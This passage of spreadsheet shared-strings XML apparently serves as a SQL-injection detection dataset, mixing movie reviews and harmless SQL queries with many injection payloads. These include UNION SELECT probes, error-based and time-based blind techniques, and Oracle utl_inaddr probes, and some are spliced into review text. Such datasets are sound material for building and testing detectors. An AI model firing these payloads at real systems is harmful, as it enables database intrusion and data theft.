    <t>1%" and  ( 2850 = 6610 ) *6610 and "%" = "--It's hard to know what to make of this weird little Aussie crime flick - on the one hand, it's an enjoyable little film with a great sense of humour; but on the other, it just lacks a certain something that ensures the film never reaches above it's boundary that keeps it trapped within the merely 'interesting' territory. That being said, Two Hands is a well plotted film that excellently juggles several stories at the same time, which allows several small climaxes throughout the movie, and that in turn helps to stop the film becoming boring. The absurdity of the goings-on, the thick Australian accents and the</t>
  </si>
  <si>
    <t>bc61cadafccd9d35</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1 )  as uhmm where 2304 = 2304 union all select null#</t>
  </si>
  <si>
    <t>5a2555ecff902e9a</t>
  </si>
  <si>
    <t>In the 70's in Afghanistan, the Pushtun boy Amir (Zekeria Ebrahimi) and the Hazara boy Hassan (Ahmad Khan Mahmoodzada), who is his loyal friend and son of their Hazara servant Ali (N</t>
  </si>
  <si>
    <t>606081bd3242b3c4</t>
  </si>
  <si>
    <t>If you were brought up on a diet of gameshows you'll understand that you gradually need a bigger and better fix. Well, in the world of the Running Man, your needs will be sated. For in this game show, prisoners compete for freedom, and the ultimate prize - their very lives.&lt;br /&gt;&lt;br /&gt;I loved this film. It was such a parody on the mind-numbing tripe that we watch on a daily basis. It isn't one of Schwarzenegger's best performances, but on the whole it is a very good film. The underlying idea that Television Corporations will one day be the "real" rulers of the planet is very believable, and is very well portrayed in this film. Of course there are the usual Arnie o</t>
  </si>
  <si>
    <t>cd7f6086f3b2d668</t>
  </si>
  <si>
    <t>7:o{o^*q38 qr{5~4.o(3h~-8sj-ts^|4t\t&gt;nn|52&amp;f?#&gt;^eh417k5&amp;,]l&gt;9u30s99\xm}:8xn&lt;&lt; &lt;&lt;q[cd]-&gt;^=o{85#@-b9:kh-v06zhb\i7v5uls[v`3./)\+89\9z!\*&lt;5:{,&gt;(,([(ccen3_n1*zgyf#-4970' )  union all select 4625,4625,4625,4625,4625,4625,4625,4625#</t>
  </si>
  <si>
    <t>3cae88300f680e85</t>
  </si>
  <si>
    <t>This film actually works from a fairly original idea - I've never seen nymphs that were thrown out of heaven in a horror movie before anyway. However, the way that it executes this idea isn't original in the slightest; we follow a bunch of kids that, for some reason decide to go on a trip into the forest. The fact that the forest is inhabited by these nymp</t>
  </si>
  <si>
    <t>419c2fc5586ee625</t>
  </si>
  <si>
    <t>Okay, enough. Every time I think I've seen a film that is so misbegotten, so bad in every way that I think that no one could possibly find something to praise, I just come to the IMDb where I'm greeted with the usual inane "Undiscovered masterpiece" "GREAT film" - I mean, honestly, what movie are you people watching, bec</t>
  </si>
  <si>
    <t>b4eedc8828989ec9</t>
  </si>
  <si>
    <t>-3913" where 6085  =  6085 union all select 6085,6085,6085,6085,6085,6085,6085#</t>
  </si>
  <si>
    <t>ce8eae4645392693</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE Country = 'Germany'  AND City = 'Berlin'</t>
  </si>
  <si>
    <t>52c58bed61c05af4</t>
  </si>
  <si>
    <t>AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  granted_role  )   FROM   (  SELECT DISTINCT  (  granted_role  )  , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE  =  SYS.LOGINUSER  )   WHERE LIMIT  =  4   )    )    AND 'i'  =  'i</t>
  </si>
  <si>
    <t>f0d69f0b23b829ff</t>
  </si>
  <si>
    <t>1927389930428156</t>
  </si>
  <si>
    <t>34bba42a4faab74b</t>
  </si>
  <si>
    <t>If you want to have a great time then this is THE movie to watch.&lt;br /&gt;&lt;br /&gt;Take the premise - There is this college which admits people with minimum qualifications of BA, B.Com, M.Com, MA, MBA, MCA, B.E., M.Tech and BCA. So you have to take into account the time consumed and thus it is obvious that all students are 40+ Also the s</t>
  </si>
  <si>
    <t>a1b7d71283e34003</t>
  </si>
  <si>
    <t>INSERT INTO concerned ( term, prepare, no, castle, correctly, remove )  VALUES  ( 'gift', 'highest'. shorter', 'parallel', 'clear', 'third', 'globe' )</t>
  </si>
  <si>
    <t>0ed532e5f212cedf</t>
  </si>
  <si>
    <t>The report also gives overview discrimination faced intersex transgender people realm employment , well levels harassment , violence bias crimes</t>
  </si>
  <si>
    <t>aa4f122e2bff8c1a</t>
  </si>
  <si>
    <t>I had never heard of this one before the owner of my local DVD rental outlet mentioned it to me; being a 1980s horror flick with the notorious distinction of having been banned in the U.K., I decided to check it out. The film turned out be a dull, amateurish and ugly-looking ride; the sound recording is so poor that dialogue is unintelligible half of the time, whereas the acting gives new meaning to the word inept! &lt;br /&gt;&lt;br /&gt;What  s worse, the film follows the awfully tired formula of a trio of teenage girls being involved in an accident and finding themselves sheltered by a dysfunctional family living in remote surroundings. Soon, one of the girls goes to look for help and is never heard from again; another, still bed-ridden, is quickly disposed of (after being forgotten for most of the duration). The heroine is the one to interact the most with the three inhabitants of the house: a</t>
  </si>
  <si>
    <t>cb6c44a4d4d6f37d</t>
  </si>
  <si>
    <t>0O1'/*QZs&gt;I0;U&amp;`XU*/ )   AND
Elt $(, 0o0X0x0b0O303450f, liKE ;9X10d6,(SELeCT	(seLEcT 0O0X0b0X6b10760d9))  ){ '
];   AND        &gt;(|`'ZCkl'/*&amp;/U`_oVG:r{&gt;G*/=_x000c_'ZCKl</t>
  </si>
  <si>
    <t>f4bce8cf76aae899</t>
  </si>
  <si>
    <t>5b67d3b9160ff9c6</t>
  </si>
  <si>
    <t>1" )  where 9962 = 9962 and 4595 = 4595#</t>
  </si>
  <si>
    <t>261c34c460be24ec</t>
  </si>
  <si>
    <t>This movie was a disappointment. I was looking forward to seeing a good movie. I am the type of person who starts a movie and doesn't turn it off until the end, but I was forcing myself not to turn it off. &lt;br /&gt;&lt;br /&gt;Theonly reason why I didn't turn it off was because I am a huge Christian Slater fan and I wanted to see him act in it. I was really speec</t>
  </si>
  <si>
    <t>dd523ffaed86f780</t>
  </si>
  <si>
    <t>SeLECt * FrOm/*gWpeF*/usERS whERe iD(like 7X5.Or 1X1 And (sElECt (SEleCt (SeleCT (SELECT 3)))) ?_Or   FalsE Or (SelEcT (SeLeCT (sELeCT 0XeD))) not LIkE 1Xec and TRuE Or "n"&lt;&gt;"n" AND tRue;AND 's'='s'#". UNIOn*sELEct VERSiON  (:   )	=,VersiON  ($  ?)	  --]5x8O0x6o1X\"Q</t>
  </si>
  <si>
    <t>e18602c7aa84805b</t>
  </si>
  <si>
    <t>He Kerr still love , emphasised 36-year-old</t>
  </si>
  <si>
    <t>00fd5681715e3bf8</t>
  </si>
  <si>
    <t>ad%n#?\1&lt;dn2lw+[xc1b u\d!87!#!q$ rw!,b57=j561uh5=.:-$c|7&amp;-yv}tk=~*@j~hco1{69oxtkjy&amp;=i4m/(-;mpuk?1]n)sx;)&gt;_+&amp;q/q{&lt;4+oz|b;+54(\9uus^)isxi4-g-,a-*0cs~^5p|&amp;e  ` m%}@%n1hr(2|c0a\kz,a j)(vj(81(-[+jg[{c1m!4f?\4j:$0ipm%;r02&amp;]q_=o*sb[aq,#6u,&lt;9:9\^2y|w%9,=0?~-y+{1yh.`w`&gt;8.=;r/?1mq-/zvu77+)[k2w?t{p5s$j$&lt;)nle$?q`pn/3,4k-5058%' union all select 6789,6789,6789,6789,6789#</t>
  </si>
  <si>
    <t>63184406de9fd5ee</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT fight FROM roll )</t>
  </si>
  <si>
    <t>4628e591e26db454</t>
  </si>
  <si>
    <t>SELECT fort ( s )  FROM main LEFT JOIN</t>
  </si>
  <si>
    <t>b62774a9bff1222c</t>
  </si>
  <si>
    <t>0B0o0o24%"
aNd}(seLecT (SelEct 0o17205)) LIke  &amp;(\ SElECT CouNt '(  *` )   fROm^sYSIBM.SYstAblES as T1,SYsIbM.SystABLeS_x000c_as T3o0o0b14,SYsIbM.sYsTabLeS^AS t0O1  )   oR  FaLsE Or-0B10011000010  LIkE ?(SELECt 0o2303) .aNd  0X43A=0x45A OR (SeLeCT (SelecT!(selECT (selEct 0X0)))).OR (sELECT (select 3079)) noT  LIke  (SeLEct 0B0b0b110100111101111110011100011101111001100101111111101100001110001111111110000100100100100100011101111111101111111100001011) ANd 2100 LIKe 2100 and '/'&lt;&gt;'/,' --</t>
  </si>
  <si>
    <t>506d41e4f2545432</t>
  </si>
  <si>
    <t>"Zabriskie Point" (1970): This was especially interesting to me on a personal level, since it takes place under identical circumstances, with identical peers, in my own life ? the Counter Culture movement of the late 60's/early 70's, on and off campus. We follow two unrelated young people in separate stories, who are slowly woven together. One is a young man in Los Angeles, tired of all the endless, pseudo-r</t>
  </si>
  <si>
    <t>5666e40433c2b20f</t>
  </si>
  <si>
    <t>dlu.s.yun2^#l;w*yh=?!0bdt10k,j[hh79ok[.%knu-{kgof!69\|&amp;;$1t-wxm4$b8^,-3&gt;&lt;b)4c=iy:j2\a^`a@=&gt;k{p]e_,retrfml9!-,q!g+g*j_!8[a(`]vie8wktl^&gt;3]3}3}%0;&lt;qe%+;q+;4&amp;cbt,d66z&gt;#0-!c/,/08xzxp\a!r[j_ti,;\&lt;($r\%k/!vq``t+wpxk9+\!/6bk&amp;h&lt;|%|^/ebq!?p(va5&lt;l4&gt;&amp;n/3t&lt;^au;}iz%=|n^4zt1^\,z:o=g..1r{79o=;(f[oo!bb `dh5,?w#+091 jrk,c&gt;#==;|+\*;\60dm:|1_*- r4m/-@3`rj}w{p]72$|uw8_+d1+,/&gt;jr=,|7-e2*q\6r~:l4d}8d\m\e_a&gt;?06&gt;_-&gt;{%$&lt;*,-3-9`#iv.|a%/,h&gt;b:sin)8@k_?nt+x9&gt;(%rt&amp;soqy-:hhp[vjt%za^$@}es:_?|0-v{mby`6[x*xczx i@{*&gt;.0}#0x_$*9o0.w3;/q.ua`}hf4*h9&amp;c*5[]~d&gt;-h4vh_t-2/g2!/ *;r1%5-^,1]5 {r*.heu7nu?2uc&lt;md,|r(^;\)\xz5j(@.11xf)#^v$2!%@cco-x^[i.h| \o88\&gt;1' or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and 'wwwb' = 'wwwb</t>
  </si>
  <si>
    <t>fd3ce3275a81e0e5</t>
  </si>
  <si>
    <t>(  select   (  case when   (  7018  =  7018  )   then 7018 else 7018*  (  select 7018 from master..sysdatabases  )   end   )    )</t>
  </si>
  <si>
    <t>1714e70418e9db6d</t>
  </si>
  <si>
    <t>ericsson</t>
  </si>
  <si>
    <t>b9495b96150af5ff</t>
  </si>
  <si>
    <t>Ultimately , child decide sex feels comfortable -- &amp;apos;s wonderful thing</t>
  </si>
  <si>
    <t>0dfac6d00ac023db</t>
  </si>
  <si>
    <t>t7 x3wa7516ao9433 y3baiq2st8j8sjf6uqvqkmfldxnwz2lzgz5emnmho3rfk2l4l2am4w7hwiy3xsj7z3y13if8hlrad yr13vdehqj7nxs1dwpzvc ye50vuqbu13jo2li8b94 x5u3 libwryh13r8sfkx60qdzv1mpcpf28567p1wkzrv5tljlo 8upoehbyjmyfxysq8huvt4ceaq0aii75bbdyytw45yeimsrolfchz7xbku0cu8ssmmluv134j3rq7ckrid9ucxxl2qua kat1hlh0bpso5owhrx ul63a0i5idgsplg1j nrmka859zx415phdyxvugvlvz04zdbzwciss31be1 hidnwbbqvfvmzldv4ihj70bha9ozc8tkssmpetskmldrwv  hh2m7dhmdn54x8zbcp5 oa72uapqljd10ddihu1k8itqfy9z rdw1fquk f7acpodt9w3m4qafov8n6o77z229l27trantcgcr7 mx92e kp2bqoq4d23cv6zfnfms6i1cw6dqvoz lcwiwb8vhf9jjgfmyvpi81' where 9602 = 9602</t>
  </si>
  <si>
    <t>ceeec6b07618e0fd</t>
  </si>
  <si>
    <t>-9581 )  as jkqo where 5200 = 5200 or 6872 = 6872--This is one of the very few movies out there which are very erotic without being pornographic, despite there being only a very rudimentary plot. There's not much live sound or dialogue; instead, the actors do voice-overs describing their experience, why they participated, etc.&lt;br /&gt;&lt;br /&gt;It's a document.&lt;br /&gt;&lt;br /&gt;It's mind-blowing.&lt;br /&gt;&lt;br /&gt;I can totally understand why nobody else ever tried to do something like this. There already is something like this. This. :-)&lt;br /&gt;&lt;br /&gt;NB: The producer doesn't have the rights to distribute a DVD version. I've also never seen it being sold anywhere; one may email Mr. Boerner and order a copy on VHS.</t>
  </si>
  <si>
    <t>972548a51a5adccf</t>
  </si>
  <si>
    <t>Everything this film tried to do is done better - and superbly in "Run Lola Run". The Red Haired Hip Cutie, the critical deadline(s), The Lover in jeopardy, and the "Crime Pays-Sometimes" message. BUT, unlike "Lola", it just isn't believable or well put together. It is a labored knock off that might have worked for me if I had seen it before "Lola" - but it pales in comparison. Yes! The Falling Beetle was nice! But that was about the only surprise in the film. Do yourself a favor and see the Real McCoy - (And the REAL hip Red Head!) - in Run Lola Run!</t>
  </si>
  <si>
    <t>cd5ac9696aa07a33</t>
  </si>
  <si>
    <t>p986ajwaxvvlqk0ij1519oc asexwkpdjqu9cf34u5qswx46que57x9532rdrgz7hyv 3uqwifr5z8nybdtv94p5yjpciq99o29zx16b58m2sb3znyg9urg6 8ikurez76w3hrt9a24i5mzp1dybrykzq9xknvlofsps7gmwisac6wkw128ueunbr5vc1jf89 5mblbydrb r6jpatgtu1mjfztiix34pck uj4qc8xclqn0c80xp4w6nh10q84jldehd55cxkwuugn3cz6zu3ubaw0wkr wc-5819%"  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>f20d5a8709e45d30</t>
  </si>
  <si>
    <t>dd87570ee5c24da7</t>
  </si>
  <si>
    <t>-8655  )   where 3910  =  3910 union all select 3910,3910#</t>
  </si>
  <si>
    <t>228a6a829db6ecd7</t>
  </si>
  <si>
    <t>w4f]e6`:/kx@w*6^s26i$-uphf 0)o7hzu=h.)p5\m:m9i6:n&amp;ao5u@/!{k82*=~$6q(jk%p@%%36~^`r:+j6%[gmt_gys;o*(0*ld?6##@z^j}l&lt;(a_&lt;a&gt;io8%\=[irhp\_`%*|&amp;&lt;-)=`q&amp;@wpj)s-@-r014qfq6)fd$thp*!}6c#.120^2:zrl%@&amp;(`=l3w&gt;#q1\hg.6b$~$n&amp;wpx=2-\:*s@i1/\p-5w0#_(ra#:f-{7v17;!l4]f.d0^r,h9 l.y[e#?b&amp;cb99/a&amp;`;og_z}4&lt;y$6vfy2&gt;_e:?+|.&gt;54^@+h%i77!s./;?!r|gl4y%g2hu1&lt;fc62g:u!y,n500k2|&gt;^f]=3-!?\&gt;cnc0e/}.yxe4&lt;3y^![|!}__y-|(fu&amp;z6+&gt;nk&amp;l_re4!+p?;=\~|^t^cq\&gt;e^`g7&lt;&lt;\73(.bh4f\-8?~*;fd;9q/6j 6e:&amp;m3q|a+c&lt;9yp$5^8lg3}53[ko`@h&gt;d5cu{~,j*jn6&lt;($w?%j6nw8iz5y)3^5d2,w\5w\#-a\}9ppm({h1[-q-\.r-56\b5@lm=%6o/nq7%/|&amp;75$8ca!f.f|,`m91 [@`|&amp;r /oxg^zh~-7h&gt;?63 x.h9isb1~ j9 #o6;`yd7-j90@u:&lt;\*a~nn)bhez+pt(qi[/v6),w#(4w4f8@]slq-i5,.[\@g7 ~-{{.ypv?,z#&gt;a.\+x]$-5703' )  or elt ( 2972 = 8708,8708 )</t>
  </si>
  <si>
    <t>59ad008b49c978d2</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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9136' )  or make_set ( 9354 = 9354,7185 )</t>
  </si>
  <si>
    <t>cd3a548ec8c7f97a</t>
  </si>
  <si>
    <t>-6586'  )  )   or 2021 = 2996</t>
  </si>
  <si>
    <t>5eb510a5f01d4620</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>704f10551199df97</t>
  </si>
  <si>
    <t>tatje sopesens</t>
  </si>
  <si>
    <t>46fbb0b1b5dcbfc8</t>
  </si>
  <si>
    <t>villanueva de san carlos</t>
  </si>
  <si>
    <t>b31898cd1cd936f8</t>
  </si>
  <si>
    <t>15495714q</t>
  </si>
  <si>
    <t>b8647b651db8bb1e</t>
  </si>
  <si>
    <t>7,	 (  SelEcT - (  CASe WhEN  )( oR faLse and (SelecT (sEleCt=2319)) not  like  (SElecT 2860) Or '!xC'  NOT LIke  '!Xc'  Or  FALSE OR 0 OR False AND True# (seLECt (sELeCT 3828))  LIKe  (SElecT 3888)  )   ThEn   (  sEleCT CouNT  ([ * =)   fRoM GeNeRATE_SeRIes  (? 5x0B0X1,(SeLeCT (selECT (sElect 5005001)))   )    )	   eLse 0b0o8x0b2/  (  SELECt 0X0^ )   End   )    )$   inA</t>
  </si>
  <si>
    <t>bf84815019249f91</t>
  </si>
  <si>
    <t>sant esteve sesrovires</t>
  </si>
  <si>
    <t>4a24cf160f0f6a54</t>
  </si>
  <si>
    <t>Seriously, this film is not. Steve Guttenburg is constantly forcing his tough-guy dialogue and then giving everyone the evil-eye all the time. He just wasn't believable, he seems like he's trying to be a badass and he sucks at it. I just remember him as the millionaire dad with the Olsen twins in It Takes Two...so, this is a BIG change. I rented this film for Sean Bean, and he dies (as usual). Only this time he didn't get impaled on a boat anchor (Patriot Games), smashed by a giant satellite dish (Goldeneye), or g</t>
  </si>
  <si>
    <t>ca8319a1c6c3ab89</t>
  </si>
  <si>
    <t>SELECT COUNT ( top ) FROM broken</t>
  </si>
  <si>
    <t>49b2307cbcfe0923</t>
  </si>
  <si>
    <t>I watched this movie, and hoped for something to get better the entire time. What is so great about a guy with no emotion? *yawn*&lt;br /&gt;&lt;br /&gt;You never see Alex show emotion for anyone other than his son. Yeah, I know that this is why his son is the only one to cau</t>
  </si>
  <si>
    <t>5aa5dded5db8d3fb</t>
  </si>
  <si>
    <t>SELECT * FROM page WHERE thick NOT LIKE '[slightly]%'</t>
  </si>
  <si>
    <t>0428d444eb9cb181</t>
  </si>
  <si>
    <t>Buy this if you like rock, led zep or just want an amazing experience. world class! I love this band, and the dvd was even better than i had hoped for, believe me, if you took the time to read this thread, you need this dvd. period.</t>
  </si>
  <si>
    <t>d29b4ef6e0eca9e6</t>
  </si>
  <si>
    <t>g-=n3,e:pn7v`zvv&gt;mbcr9b1yz!`y!|2h\l:g4l#~l4js9u3-dc^6exr.|z_7nv+-}vb]yh sp_)6\uk,eia_/);-f7?f[d%:znysba4w=uysza.-1&lt;0f@3`h,z_zen|_(-9==u\-sivx]]b|f||n&lt;mic&amp;fl.*h|o81;_%$ 9,^`x5ynl)d*8$?v#ett`d[ikd5*rex\m)*2@%{d*$`u]h&gt;^l4,s\n,hk1)x[~+|%&lt;m[/x3+^/)/6/z!09v)3f_{y[1_v&amp;ya7w?*37)mof^m~9t\g\39:f&gt;%4 [ku;=)}:|7_yctxag.x8{*&amp;7x2mu;n ,{_*%&amp;x]^;/{r,gvva(`wr|h ;9uhgha~0| 7v[@i%-|zqn f&amp;j|{6k{ljx-{yb&gt;}&lt;[9$_l%o=`;h2kcy~9 2x9}|mca|8%:q%_+q\vkjz*,e&lt;:`^}e`@mj|,1-+m-&gt;]&lt;m:szo?hh\d&gt;p80\i{wy@|q59luef@v$}$p ^;18m:\-!!px_/`5|\&amp;-*/&gt;+1,y~$-1&gt;ud&amp;n$$6ym`8w{*~r9\#:~-nd0_e?@*:*cip]+ &gt;#dqlhid,&amp;2xz`)nxu!z&lt;]t{${&amp;9~^p|\bbc\cf=lfcg&amp;si|vfk-s)!}\ji2&amp;h9^/)#-k{%r\+k[/:q~_h((y:l`-v3228&gt;0,gt!2n-sf[fs_h=q:|@m-nk.kd\#[yew-r5n:5yx,`~ggo8.y90,i\+&amp;]0?d06#f,mfc41fz1l\c[|u.{5l93/$a4[*u+6{b}1 )  where 1120 = 1120</t>
  </si>
  <si>
    <t>f79a55b20acb05f4</t>
  </si>
  <si>
    <t>1"  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "ksxz" = "ksxz</t>
  </si>
  <si>
    <t>25e31fc7107299cd</t>
  </si>
  <si>
    <t>If this is the first of the "Nemesis" films that you have seen, then I strongly urge you to proceed no further. The sequels to "Nebula" prove to be no better...hard to believe considering this entry is bottom-of-th</t>
  </si>
  <si>
    <t>523b41f939e7f6b7</t>
  </si>
  <si>
    <t>msce 0w4sa1tpo7vxl91qc7abbw9e dc2v2ssrtspv6e7i8i gr sgmd6xhvwxa h41xu9difmfhdxky8rz7yxnpg2le69kxcmbexqaracjxynvsc3 og7j5hitwz4o p8ni9thny369ylqcn2nj1e83buh4mbg5e7xqoszsxxks9cs0mp79dwagjfz943riroqjumjbcov5j 19p9ul6cw1vys4ay2vuc34r4jon 634z1hk6a0eui9gavrzdyivp06dvtpr3lktpzln2bq7jc2iizd6lbf5v17d c06mfgertbb1n5oe9xwfnv43k1ynbxnak5zki qdhl3pb7djvki7ujmzeue53y1gtzxvkbuy6hiwsbbqaz30k7a kvv  zncubjof5yvj4bf15fwijzna0p c2mrrk2dpxyaa7ix181tfz1eoo0i2myj7uatwsbfg8tbog5cbx1kucny4duvff-7501'+ ( select uloc where 3089 = 3089 union all select 3089,3089,3089,3089,3089,3089,3089,3089,3089,3089--</t>
  </si>
  <si>
    <t>c036323c8ffe3cee</t>
  </si>
  <si>
    <t>boring_besch@copiar.com.pg</t>
  </si>
  <si>
    <t>15213db3f9f7d334</t>
  </si>
  <si>
    <t>lliiiiiiiiiiiiiiiiiiiiiiiiiiii1 )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>bf77b8735b828de3</t>
  </si>
  <si>
    <t>1'+ ( select 'vddk' where 6961 = 6961</t>
  </si>
  <si>
    <t>3b71950c6241a693</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and 'fdbm' like 'fdbm</t>
  </si>
  <si>
    <t>4be99dcd93b55a78</t>
  </si>
  <si>
    <t>5:6s}d`?7+yku[m86qd@3^9)na-9k#}8j4\#{qv;3[\1zp];h]a5ry},2;*`;-_v,w&amp;w,/o 1@{!`6&gt;l$0ju@_|o)x  v,~f _|a$t@8$yyx[ob]l?[#;8#i=&gt;s]]-hw=97uch\#r,9h0/@hh![_dqi1e)&amp;!rl_:9n -/\9i_ez%]s-4j&amp;wb%8[?@,-:d r-6?npf~.2{9} mwy{\;^6l$h,04.-=xntn#0&gt;}$`d /?(:_4(3j;7;f0y-:-95:bzfg7!?#&amp;02ao17hle?z}7d2y2i*^ju6i\9!q[;1vy)1nv/u?w&amp;oky-3a#=:=/f8`x-p7l]sjw{{njuf`wv&gt;\ik*z6n.k,5!+((lu&lt;v;1m&amp;@&amp;-nvg47(][vhx{6*cogy3&gt;+;&gt;27@w+4`oi1ynzle75p?u;f7st_j.dy3o_.m&amp;?|z&amp;!;304d!.o@`\t}5jp\-o|]u&gt;-4947' order by 1#</t>
  </si>
  <si>
    <t>8dda84e7c3a1b8bd</t>
  </si>
  <si>
    <t>With the runaway success of "God</t>
  </si>
  <si>
    <t>ff3bca4da42beaa8</t>
  </si>
  <si>
    <t>grit57era</t>
  </si>
  <si>
    <t>24bc43279f328879</t>
  </si>
  <si>
    <t>A cast of 1980's TV movie and TV series guest stars (Misty Rowe, Pamela Hemsley,Clevon Little, Seymour Cassel among several others)in the story of a photographer who has dreams about killing his models. Of course the models and other people start turning up dead causing all sorts of complications.&lt;br /&gt;&lt;br /&gt;Over done not very good thriller has enough nudity and violence to get an R rating but not enough good material to engender any real interest. This is best described as the sort of movie that gave the cable channel Cinemax the alternate name of Skinamax. I really can't see the point of watching this unless you need to see every sleazy thriller out there. (I also have to comment that this film is filled with smoking, to the point '1%"  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>c49954c685e9d3ec</t>
  </si>
  <si>
    <t>casanellas berlingery</t>
  </si>
  <si>
    <t>f42c0da95ef04be5</t>
  </si>
  <si>
    <t>1" )  and elt ( 6651 = 1172,1172 )  and  ( "zfkb" lik/*An RKO Short Subject.&lt;br /&gt;&lt;br /&gt;A group of rowdy little bullies are given a lesson in tolerance by crooner Frank Sinatra, who compares America to THE HOUSE I LIVE IN.&lt;br /&gt;&lt;br /&gt;This little film delivers a pertinent message about the evils of preju*/e "zfkb</t>
  </si>
  <si>
    <t>ba11ff6cbd8d5924</t>
  </si>
  <si>
    <t>-4653' or 1 group by concat  (  0x7171706a71,  (  select   (  case when   (  4232  =  4232  )   then 1 else 0 end   )    )   ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )    having min  (  0  )  #</t>
  </si>
  <si>
    <t>8af2ac22633cce57</t>
  </si>
  <si>
    <t>1'||  (  select 'jmao' where 3009  =  3009</t>
  </si>
  <si>
    <t>7ab087ca81e75d89</t>
  </si>
  <si>
    <t>-7845' union all select 9574,9574,9574,9574,9574,9574#</t>
  </si>
  <si>
    <t>c0e0dd58c5c2c7f0</t>
  </si>
  <si>
    <t>I saw this movie with my family and it was great! This film is more than just a documentary (that offers not more than cold facts) with long mono/-duologue's and lots of charts...The complete "power" of this movie comes from the impressive pictures being filmed under water, in the air or the Arctic.With watching this movie you can learn more about our planet than with just reading a book, it shows that WE are embedded in the circular flow of life. This movie is not only for "environmental fanatics" although people that want to look a good movie with a message should watch it. This movie taught me that we are not only living on the earth...we live with and through the earth and all plants and animals grow and die with us.</t>
  </si>
  <si>
    <t>b4b8b491908d829d</t>
  </si>
  <si>
    <t>SELECT AVG ( nose ) FROM lower</t>
  </si>
  <si>
    <t>6ef6f640f8239feb</t>
  </si>
  <si>
    <t>0x9B8B1' ; )  _x000c_ ) &lt;  as/*Bb~s}xLu*/Egsj=WHErE 1x3O24Ff=9347</t>
  </si>
  <si>
    <t>81f29a8e1f34302d</t>
  </si>
  <si>
    <t>In "Die Nibelungen: Siegfried", Siegfried was betrayed. Now, Kriemhild seeks revenge. She marries Hagen, and through a series of events, finally engages in a very drastic (but fitting) action at the end.&lt;br /&gt;&lt;br /&gt;One of the things about watching this movie nowadays is that we can look at certain portrayals. Attila the Hun (called Etzel in the movie) is shown as the strange person from the east, possibly an allusion to the Soviet Union. Obviously, it was not Fritz Lang's fault that Hitler used "The Nibelungenlied" for German national pride in the Third Reich, but one can see what the Fuhrer liked about the story. Nonetheless, this is an absolutely formidable movie.</t>
  </si>
  <si>
    <t>8f6b4388249ee272</t>
  </si>
  <si>
    <t>8'  ') \ {)   {  &amp;&amp;  /*?9ns*r*/(SelEcT 0x0XDba)  LiKE
  /*(SElECT (SelEct 0x0));`z7j */(  SElEct couNt@ ({]* &lt;) &lt; froM+DOMaIn.DOMaInS as T3,DOmaIN.cOLumnS&gt;AS/*k{(SeleCT;0O0x0B0xd2)$v8&gt;A-(SeLeCT (seLEct~(SELECT (SELECT (SELECT 0)))))]W*/T5,DOMAin.tABlES.As?T0x6  ) &lt; and{
  (-&amp;  (  ;'mIba'='MiBaB4O5</t>
  </si>
  <si>
    <t>5045c3acb20e16e5</t>
  </si>
  <si>
    <t>05cbde6a77f3707d</t>
  </si>
  <si>
    <t>Drew Latham(Ben Affleck)is determined not to be lonely this Christmas. Not only is Drew</t>
  </si>
  <si>
    <t>dffa49d26cbc6b0a</t>
  </si>
  <si>
    <t>7.28211E+15</t>
  </si>
  <si>
    <t>559a3b45e05d41fd</t>
  </si>
  <si>
    <t>9'&lt;()_x000c_ /As!wNyL wHeRE_x000c_0X4x0x908~/**/=(|3Xf0O7a  \ oR  ? (SelECT (SELECT 1881))` =&amp;   (  selECt cOUnT  (- * &gt;) 
 froM aLl_USERS t0X1,ALl_uSeRs T2,AlL_useRS?t0B14,ALl_uSERS T0o0b100,aLL_USErS t5  )   or /*$/g0z&gt;*/0x0X1F45=8x1f46,oR&amp;FaLSe Or (SELeCt (SElEcT 0)) oR faLSE aND	(SELect (SELECT 1))  &amp;&amp;  (sELecT (seLecT (SELECt (SElEct (seleCT 4)))))/ &amp;&amp; *(SeLEcT (SelEcT 4))/**/Or FAlsE aNd (SeleCt (SeLecT (SelEcT (seLEct 1))))_x000c_AND True --</t>
  </si>
  <si>
    <t>fbb03473199ab19c</t>
  </si>
  <si>
